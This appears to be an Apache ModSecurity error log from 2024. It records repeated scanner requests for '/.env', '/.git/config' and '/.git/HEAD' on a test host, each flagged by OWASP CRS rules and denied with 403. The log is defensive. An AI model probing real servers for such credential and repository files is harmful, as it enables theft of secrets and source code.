[Thu Jan 25 16:21:54.162927 2024] [:error] [pid 623297] [client 138.197.75.188:37098] [client 138.197.75.188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZbJ8ktmSxdtEP7qx6CUmbAAAAAI"]
[Thu Jan 25 16:21:54.163110 2024] [:error] [pid 623297] [client 138.197.75.188:37098] [client 138.197.75.188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZbJ8ktmSxdtEP7qx6CUmbAAAAAI"]
[Thu Jan 25 19:30:19.469476 2024] [:error] [pid 613548] [client 138.197.75.188:46796] [client 138.197.75.188] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZbKou5TnXZHOpJKS5mgX-gAAAAQ"]
[Thu Jan 25 19:30:19.469757 2024] [:error] [pid 613548] [client 138.197.75.188:46796] [client 138.197.75.188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZbKou5TnXZHOpJKS5mgX-gAAAAQ"]
[Thu Jan 25 19:30:19.469998 2024] [:error] [pid 613548] [client 138.197.75.188:46796] [client 138.197.75.188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZbKou5TnXZHOpJKS5mgX-gAAAAQ"]
[Fri Jan 26 04:15:49.321930 2024] [:error] [pid 635233] [client 157.230.47.228:60442] [client 157.230.47.228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZbMj5RIpiMErlwqsOn9F5AAAAAM"]
[Fri Jan 26 04:15:49.322209 2024] [:error] [pid 635233] [client 157.230.47.228:60442] [client 157.230.47.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZbMj5RIpiMErlwqsOn9F5AAAAAM"]
[Fri Jan 26 04:15:49.322392 2024] [:error] [pid 635233] [client 157.230.47.228:60442] [client 157.230.47.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZbMj5RIpiMErlwqsOn9F5AAAAAM"]
[Tue Jan 30 04:07:55.516374 2024] [:error] [pid 739175] [client 35.181.57.249:47090] [client 35.181.57.249] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZbhoCzVcvGW9b055tozNSgAAAAI"]
[Tue Jan 30 04:07:55.520532 2024] [:error] [pid 739175] [client 35.181.57.249:47090] [client 35.181.57.249] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZbhoCzVcvGW9b055tozNSgAAAAI"]
[Tue Jan 30 04:07:55.520722 2024] [:error] [pid 739175] [client 35.181.57.249:47090] [client 35.181.57.249] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZbhoCzVcvGW9b055tozNSgAAAAI"]
[Tue Jan 30 17:05:36.390188 2024] [:error] [pid 739173] [client 35.181.57.249:53284] [client 35.181.57.249] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZbkeUNrCdYRqCvEbSURCcAAAAAA"]
[Tue Jan 30 17:05:36.390505 2024] [:error] [pid 739173] [client 35.181.57.249:53284] [client 35.181.57.249] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZbkeUNrCdYRqCvEbSURCcAAAAAA"]
[Tue Jan 30 17:05:36.390701 2024] [:error] [pid 739173] [client 35.181.57.249:53284] [client 35.181.57.249] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZbkeUNrCdYRqCvEbSURCcAAAAAA"]
[Wed Jan 31 07:47:12.311902 2024] [:error] [pid 766809] [client 35.180.91.125:52034] [client 35.180.91.125] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zbns8FiX6gwh_QQz1LIsdwAAAAo"]
[Wed Jan 31 07:47:12.312233 2024] [:error] [pid 766809] [client 35.180.91.125:52034] [client 35.180.91.125] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zbns8FiX6gwh_QQz1LIsdwAAAAo"]
[Wed Jan 31 07:47:12.312447 2024] [:error] [pid 766809] [client 35.180.91.125:52034] [client 35.180.91.125] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zbns8FiX6gwh_QQz1LIsdwAAAAo"]
[Sun Mar 17 04:44:43.601255 2024] [:error] [pid 1834025] [client 45.135.57.222:39957] [client 45.135.57.222] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "ZfZnK-Yw5K78NuXmK8g1IgAAAAU"], referer: http://autumnus.test.indacotrentino.com/.git/HEAD
[Sun Mar 17 04:44:43.602698 2024] [:error] [pid 1834025] [client 45.135.57.222:39957] [client 45.135.57.222] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "ZfZnK-Yw5K78NuXmK8g1IgAAAAU"], referer: http://autumnus.test.indacotrentino.com/.git/HEAD
[Sun Mar 17 04:44:43.602929 2024] [:error] [pid 1834025] [client 45.135.57.222:39957] [client 45.135.57.222] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "ZfZnK-Yw5K78NuXmK8g1IgAAAAU"], referer: http://autumnus.test.indacotrentino.com/.git/HEAD
[Wed May 08 09:53:11.931005 2024] [:error] [pid 3051250] [client 193.233.49.207:41324] [client 193.233.49.207] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "ZjsvZ1XQmRiyDbW6tBSSdAAAAAU"]
[Wed May 08 09:53:11.932482 2024] [:error] [pid 3051250] [client 193.233.49.207:41324] [client 193.233.49.207] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "ZjsvZ1XQmRiyDbW6tBSSdAAAAAU"]
[Wed May 08 09:53:11.932985 2024] [:error] [pid 3051250] [client 193.233.49.207:41324] [client 193.233.49.207] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "ZjsvZ1XQmRiyDbW6tBSSdAAAAAU"]
[Thu Aug 08 13:56:10.950201 2024] [:error] [pid 1015470] [client 45.148.10.59:38636] [client 45.148.10.59] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZrSyWompe0089Q4vms-aBgAAAAE"]
[Thu Aug 08 13:56:10.952080 2024] [:error] [pid 1015470] [client 45.148.10.59:38636] [client 45.148.10.59] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZrSyWompe0089Q4vms-aBgAAAAE"]
[Thu Aug 08 13:56:10.952251 2024] [:error] [pid 1015470] [client 45.148.10.59:38636] [client 45.148.10.59] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZrSyWompe0089Q4vms-aBgAAAAE"]
[Sun Aug 11 00:07:36.337274 2024] [:error] [pid 1091692] [client 45.148.10.142:53998] [client 45.148.10.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZrfkqHQUBqj9DniSAJ-M8QAAAAA"]
[Sun Aug 11 00:07:36.351878 2024] [:error] [pid 1091692] [client 45.148.10.142:53998] [client 45.148.10.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZrfkqHQUBqj9DniSAJ-M8QAAAAA"]
[Sun Aug 11 00:07:36.352095 2024] [:error] [pid 1091692] [client 45.148.10.142:53998] [client 45.148.10.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZrfkqHQUBqj9DniSAJ-M8QAAAAA"]
[Thu Sep 19 09:21:20.458227 2024] [authz_core:error] [pid 2032561] [client 34.172.15.109:40866] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/
[Mon Sep 23 13:35:04.541893 2024] [:error] [pid 2122247] [client 92.118.39.244:59598] [client 92.118.39.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZvFSaLgNvNCMQKZ5Eg78qgAAAAI"]
[Mon Sep 23 13:35:04.547395 2024] [:error] [pid 2122247] [client 92.118.39.244:59598] [client 92.118.39.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZvFSaLgNvNCMQKZ5Eg78qgAAAAI"]
[Mon Sep 23 13:35:04.548094 2024] [:error] [pid 2122247] [client 92.118.39.244:59598] [client 92.118.39.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZvFSaLgNvNCMQKZ5Eg78qgAAAAI"]
[Mon Sep 30 17:36:31.488383 2024] [:error] [pid 2293063] [client 35.183.145.61:59976] [client 35.183.145.61] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZvrFf6ftDAs9z02W9bMApQAAAAg"]
[Mon Sep 30 17:36:31.490716 2024] [:error] [pid 2293063] [client 35.183.145.61:59976] [client 35.183.145.61] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZvrFf6ftDAs9z02W9bMApQAAAAg"]
[Mon Sep 30 17:36:31.490957 2024] [:error] [pid 2293063] [client 35.183.145.61:59976] [client 35.183.145.61] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZvrFf6ftDAs9z02W9bMApQAAAAg"]
[Wed Oct 09 04:02:56.862043 2024] [:error] [pid 2487498] [client 92.118.39.244:52066] [client 92.118.39.244] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZwXkUJ0cuXslgW9FiRHg_AAAAAA"]
[Wed Oct 09 04:02:56.864520 2024] [:error] [pid 2487498] [client 92.118.39.244:52066] [client 92.118.39.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZwXkUJ0cuXslgW9FiRHg_AAAAAA"]
[Wed Oct 09 04:02:56.864972 2024] [:error] [pid 2487498] [client 92.118.39.244:52066] [client 92.118.39.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZwXkUJ0cuXslgW9FiRHg_AAAAAA"]
[Mon Oct 14 21:31:35.167491 2024] [:error] [pid 2593075] [client 92.118.39.244:38712] [client 92.118.39.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zw1xl5nqywwQvm5ARu_TXgAAAAA"]
[Mon Oct 14 21:31:35.169248 2024] [:error] [pid 2593075] [client 92.118.39.244:38712] [client 92.118.39.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zw1xl5nqywwQvm5ARu_TXgAAAAA"]
